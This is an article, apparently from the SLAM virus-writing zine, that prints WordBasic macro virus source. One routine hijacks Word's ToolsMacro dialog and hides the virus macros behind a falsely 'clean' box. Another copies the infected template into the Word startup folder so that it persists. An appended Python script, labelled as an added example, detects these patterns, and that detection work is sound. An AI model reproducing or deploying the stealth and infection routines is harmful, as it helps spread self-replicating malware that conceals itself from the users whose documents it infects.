
SLAM2.028: A full-stealth Technique in Macro Viruses by NJ [SLAM]

Published in Slam · 2 years ago

FULL-STEALTH ROUTINE!


First I want to say thankz to Virtual Boy for his great full-stealth routine. Yeah, right. I mean a full-stealth routine, which hides all the virus macros and, best of all, the virus works, too. Forget now this really bad ToolsMacro Box from my MooNRaiDer virus and look at this fantastic code.

OK, here is the source code:

------------------------------------------------------------- 
MACRO: ToolsMacro
~~~~~~~~~~~~~~~~~
Sub MAIN

REM Get the position of the infected document.
b = GetAddInId(DefaultDir$(8) + "\0.dot")

REM Set ScreenUpdating Off
ScreenUpdating 0
If DocMaximize() Then
DocMaximize
c = 1
EndIf

REM Create a new file to hide the virus macros in the active file.
FileNew

REM Remove now the virus document from the ToolsMacro box.
If b Then AddInState 1, 0

REM ToolsMacro Options
Dim d As ToolsMacro
On Error Resume Next
Dialog d

REM Close the document.
FileClose

REM Enable now again the virus document.
If c Then DocMaximize
If b Then AddInState 1, 1

REM Show the user the >> clean << Box. ;)
ToolsMacro d
End Sub

-------------------------------------------------------------

"Routine to infect normal.dot"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sub MAIN

REM a$ = Startup Path from WinWord.
a$ = DefaultDir$(8) + "\0.dot"

REM Copy the infected document to this Startup Path.
If Files$(a$) = "" Then
CopyFile FileName$(), a$

REM Enable the virus!
AddAddIn a$
EndIf
End Sub

-------------------------------------------------------------


This code is from Virtual Boy's macro virus >> Zero << (AKA: TK).


- Nightmare Joker -
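
The two listings above leave static traces that can be matched in extracted macro source: a macro named after the built-in ToolsMacro command, an add-in switched off and back on around a dialog, and AddAddIn/CopyFile aimed at the DefaultDir$(8) startup path. The Python triage below is an added example, not part of the original article; the finding labels, the macro names Installer and FormatReport, and the sample text are constructed for illustration.

```python
import re

# Macro names that replace a built-in Word command; the article uses ToolsMacro.
SHADOWED = {"toolsmacro"}
STARTUP = re.compile(r"DefaultDir\$\(\s*8\s*\)", re.I)  # startup path, per the article

def code_lines(src):
    """Return stripped lines, dropping blanks and REM / apostrophe comments."""
    out = [l.strip() for l in src.splitlines()]
    return [l for l in out if l and not re.match(r"(rem\b|')", l, re.I)]

def triage(macros):
    """macros: {name: WordBasic source}. Returns a sorted list of (name, finding)."""
    hits = set()
    for name, src in macros.items():
        if name.lower() in SHADOWED:
            hits.add((name, "shadows-builtin-command"))
        startup_vars, state = set(), "idle"
        for line in code_lines(src):
            m = re.match(r"(\w+\$?)\s*=", line)
            if m and STARTUP.search(line):
                startup_vars.add(m.group(1).lower())  # variable derived from startup path
            # Sequence: add-in switched off, dialog shown, add-in switched back on.
            if re.search(r"\bAddInState\b.*,\s*0$", line, re.I):
                state = "disabled"
            elif state == "disabled" and re.search(r"\bDialog\b", line, re.I):
                state = "dialog"
            elif state == "dialog" and re.search(r"\bAddInState\b.*,\s*1$", line, re.I):
                hits.add((name, "addin-hidden-around-dialog"))
                state = "idle"
            call = re.search(r"\b(AddAddIn|CopyFile)\b(.*)", line, re.I)
            if call:
                names = {t.lower() for t in re.findall(r"\w+\$?", call.group(2))}
                if STARTUP.search(line) or names & startup_vars:
                    hits.add((name, "startup-dir-" + call.group(1).lower()))
    return sorted(hits)

# Constructed sample input; Installer and FormatReport are hypothetical macro names.
SAMPLE = {
    "ToolsMacro": r'''b = GetAddInId(DefaultDir$(8) + "\0.dot")
If b Then AddInState 1, 0
REM AddAddIn DefaultDir$(8) inside a comment must not match
Dialog d
If b Then AddInState 1, 1''',
    "Installer": r'''a$ = DefaultDir$(8) + "\0.dot"
CopyFile FileName$(), a$
AddAddIn a$''',
    "FormatReport": 'Bold 1\nAddAddIn "C:\\TOOLS\\REPORT.DOT"',
}
```

The benign FormatReport macro loads an add-in from a fixed path and produces no finding, which shows the startup-path rule keys on DefaultDir$(8) rather than on AddAddIn alone.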
